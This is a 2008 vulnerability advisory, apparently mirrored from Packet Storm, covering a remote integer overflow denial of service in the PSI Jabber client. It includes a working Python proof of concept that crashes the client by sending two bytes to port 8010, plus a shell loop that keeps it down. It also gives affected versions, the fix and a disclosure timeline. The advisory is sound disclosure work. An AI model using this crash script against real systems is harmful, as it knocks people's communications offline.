PSI Integer Overflow Denial Of Service

2008-12-30T00:00:00
ID PACKETSTORM:73376
Type packetstorm
Reporter Jesus Olmos Gonzalez
Modified 2008-12-30T00:00:00

Description

                                        
                                            `=============================================  
INTERNET SECURITY AUDITORS ALERT 2008-004  
- Original release date: 12th December, 2008  
- Last revised: 22nd December, 2008  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 4/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
PSI remote integer overflow DoS  
  
II. BACKGROUND  
-------------------------  
PSI is a widely used jabber client Qt4 based, available for Windows,  
Mac, linux, and other operative systems.  
  
III. DESCRIPTION  
-------------------------  
In order doing file transfers, a open port is needed (by default is  
8010/tcp)  
  
If first byte of data stream is a 0x05, it means socks5 option and we  
enter in the vulnerable zone of the code.  
  
Is possible to satisfy the jump: cmp al, 5 -> je vulnCheck()  
  
The second byte is the amount of bytes to memcpy, but there is a check:  
  
cmp ecx, 10 -> jg goHome()  
  
Well the signed comparison lets us to send negative values, the  
acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned)  
then the check can be bypased with this int overflow, now we can play  
with 0x80 - 0xff range, and the rest of the stream.  
  
By now we pass successfully the QByteArray.Resize() and  
QByteArray.Realloc()  
  
And arrive to the memcpy, from all the data stream sended, n bytes  
will be copied, n is controlled by us :)  
The problem to make a heap overflow, is that the destiny variable will  
be resized to n. Then is possible to hangup the process or also the  
system with these two ways  
  
1. Can send a only two bytes buffer \x05\xff then the memcpy's rep  
movz will access to non paged source, becouse we don't sent the bytes  
we are saying to copy.  
2. Can be sended a very large buffer and firce a large copy of memory.  
The system can be saturated.  
  
IV. PROOF OF CONCEPT  
-------------------------  
#!/usr/bin/python  
#by sha0 remote integer overflow DoS (Linux && windows)  
#http://jolmos.blogspot.com  
  
import socket, sys  
  
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
try:  
sock.connect((sys.argv[1],8010))  
except:  
print 'Cannot connect!'  
sys.exit(1)  
  
try:  
sock.send('\x05\xff')  
print 'Crashed!'  
except:  
print 'Cannot send!'  
  
sock.close()  
#eof  
  
The process can be crashed remotelly by:  
./PSIcoKiller.py <ip>  
  
PSI down forever:  
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done  
  
V. BUSINESS IMPACT  
-------------------------  
Remote/local Denial of Service of the communications.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
PSI 0.11, 0.12 and 0.13 (last)  
PSI 0.10 not affected  
PSI 0.12.1 Solves the problem  
  
Tested in Linux and Windows, but may crash other heap implementations.  
  
VII. SOLUTION  
-------------------------  
PSI 0.12.1 solves the problem, nevertheless i suggest filter this port  
whenever possible.  
Thanks to kev and infinity for their quick response.  
  
VIII. REFERENCES  
-------------------------  
http://psi-im.org  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by  
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
December 12, 2008: Initial release  
December 17, 2008: update the new that 0.12.1 solves the problem.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
November 20, 2008: Vulnerability acquired by  
Internet Security Auditors  
December 02, 2008: Vendor notification  
December 12, 2008: Advisory documentation  
December 18, 2008: Vendor Release 0.12.1  
December 23, 2008: Published  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse of this information.  
`